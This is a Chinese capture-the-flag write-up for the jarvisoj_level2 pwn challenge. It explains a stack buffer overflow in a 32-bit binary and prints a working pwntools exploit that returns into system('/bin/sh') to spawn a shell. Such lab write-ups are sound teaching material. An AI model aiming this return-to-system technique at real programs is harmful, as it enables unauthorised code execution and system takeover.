首页 > 其他分享 >BUUCT_PWN8 jarvisoj_level2

BUUCT_PWN8 jarvisoj_level2

时间:2023-11-29 11:49:02浏览次数:28  
标签:bin BUUCT addr level2 sh jarvisoj payload

jarvisoj_level2

查看保护措施:

image.png

canary没有,很好。
栈可执行,这题也可以在栈上写shellcode。
PIE都没开,从IDA看到的地址就是实际加载的地址了。

IDA 静态分析

image.png

vulnerable_function 里面 read 读了 0x100 字节,但是 buf 只有 0x88 字节,缓冲区溢出。

那么思路很简单
image.png

ida 找 '/bin/sh'

image.png

system肯定是有了,可以从符号表中取出地址

image.png

exp:

from pwn import *

r = process("./level2")
elf = ELF("./level2")

sys_addr = elf.symbols['system']
bin_sh_addr = 0x0804A024

payload = b'A'*(0x88+4)
payload += p32(sys_addr)
payload += b'AAAA'
payload += p32(bin_sh_addr)

r.sendline(payload)
r.interactive()

image.png

标签:bin,BUUCT,addr,level2,sh,jarvisoj,payload
From: https://www.cnblogs.com/toso/p/17864430.html

相关文章

  • Web_BUUCTF_WriteUp | [ACTF2020 新生赛]Exec
    题目分析随便ping一个ip:发个串试试输入;netstat:不过滤输入,直接把输入作为命令执行了。看来是命令执行漏洞。输入;dir:输入;ls:判断为linux系统的命令执行漏洞,当前目录下只有这一个php文件。先看看根目录都有哪些文件夹可走,输入;ls/:发现flag!输入;ls......
  • buuctf-misc
    1.打开为png格式图片将他扫一扫发现密码就在这直接上虚拟机binwalk分离图片得到一个zip文件,但是需要密码才能打开话不多说直接把他拖到桌面上用archer对其进行爆破得到密码打开即可得到flag2. ......
  • Misc_BUUCTF_WriteUp | easycap
    题目(pcap文件分析这题啥提示也妹给……标题也不知所云。快速依次翻了一下TCP包,发现建立连接后第4,6,8,10个带数据的确认报文中TCP可选项(TCPOption)的时间戳回显应答(Timestampechoreply)最后一个字符分别为“F”,“L”,“A”,“G”,猜测之后的确认报文相同位置的字......
  • Misc_BUUCTF_WriteUp | 爱因斯坦
    题目分析查看图片属性,发现备注里有…………可恶。查看十六进制文件,在文件末尾找到flag.txt及zip压缩文件头尾:将文件扩展名改为zip,解压发现需要密码,看来这个图片本身还有线索。尝试更改图片高度,未发现flag……把刚刚的备注放进来试试?开了(呆住拿到flag。Flagfla......
  • Misc_BUUCTF_WriteUp | ningen
    题目提示:人类的科学日益发展,对自然的研究依然无法满足,传闻日本科学家秋明重组了基因序列,造出了名为ningen的超自然生物。某天特工小明偶然截获了日本与俄罗斯的秘密通信,文件就是一张ningen的特写,小明通过社工,知道了秋明特别讨厌中国的六位银行密码,喜欢四位数。你能找出黑暗科学......
  • BUUCTF [MRCTF2020]Ez_bypass 1
    题目环境:F12查看源代码IputsomethinginF12foryou include'flag.php';$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';if(isset($_GET['gg'])&&isset($_GET['id'])){ $id=$_GET['id']; $gg=$_GET[&#......
  • Misc_BUUCTF_WriteUp | 镜子里面的世界
    题目(png图片分析查看属性,无flag。查看二进制文件,文件头为png头,且未发现flag文本。用StegSolve打开查看图片各个通道,发现在Redplane0、Greenplane0、Blueplane0、Randomcolourmap及Graybits通道时,图片左上角存在异色点:猜测在红绿蓝最低比特存在......
  • Misc_BUUCTF_WriteUp | qr
    题目提示:这是一个二维码,谁用谁知道!注意:得到的flag请包上flag{}提交题目:分析扫码:大写F改小写,提交flag。Flagflag{878865ce73370a4ce607d21ca01b5e59}......
  • Misc_BUUCTF_WriteUp | rar
    题目提示:这个是一个rar文件,里面好像隐藏着什么秘密,但是压缩包被加密了,毫无保留的告诉你,rar的密码是4位纯数字。注意:得到的flag请包上flag{}提交题目:分析这题和之前的题目Misc_BUUCTF_WriteUp|基础破解很像,甚至更简单。我们使用同样的方法对压缩包的密码进行暴力破......
  • Crypto_BUUCTF_WriteUp | 凯撒?替换?呵呵!
    题目MTHJ{CUBCGXGUGXWREXIPOYAOEYFIGXWRXCHTKHFCOHCFDUCGTXZOHIXOEOWMEHZO}注意:得到的flag请包上flag{}提交,flag{小写字母}分析根据题目的指向,这题采用的是凯撒密码。根据格式猜测MTHJ分别对应FLAG四个字母。剩下的内容看这没有更多的提示了,猜测flag内容本身是可......